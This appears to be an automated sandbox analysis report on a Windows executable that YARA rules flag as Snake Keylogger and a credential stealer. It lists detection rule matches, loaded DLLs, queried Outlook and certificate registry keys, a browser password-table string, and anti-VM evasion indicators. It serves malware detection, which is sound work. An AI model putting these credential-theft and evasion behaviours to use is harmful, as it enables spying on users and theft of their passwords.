Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 1.2._Company.exe.2ef4340.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 1.2._Company.exe.5760000.7.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2._Company.exe.4043e10.4.raw.unpack, m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2._Company.exe.4043e10.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2._Company.exe.4043e10.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2._Company.exe.4087840.3.raw.unpack, m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2._Company.exe.4087840.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2._Company.exe.4087840.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2._Company.exe.5760000.7.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@4/4

Source: C:\Users\user\Desktop\_Company.exe

Mutant created: NULL

Source: _Company.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: _Company.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\_Company.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: _Company.exe, 00000002.00000002.4647934767.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003383000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003392000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: _Company.exe

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"
Source: C:\Users\user\Desktop\_Company.exe	Process created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"
Source: C:\Users\user\Desktop\_Company.exe	Process created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"	Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\_Company.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: _Company.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: _Company.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: _Company.exe, -.cs

.Net Code: CypherMatic System.Reflection.Assembly.Load(byte[])

Source: _Company.exe

Static PE information: 0x86919054 [Wed Jul 17 15:10:12 2041 UTC]

Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_0535B518 pushfd ; iretd	1_2_0535B521
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_06170006 push es; iretd	1_2_0617001C
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_0617A153 pushad ; iretd	1_2_0617A159
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_01399C30 push esp; retf 017Fh	2_2_01399D55

Source: _Company.exe

Static PE information: section name: .text entropy: 7.746330065690188

Source: C:\Users\user\Desktop\_Company.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR

Source: C:\Users\user\Desktop\_Company.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Memory allocated: 14B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Memory allocated: 1390000 memory reserve \| memory write watch	Jump to behavior
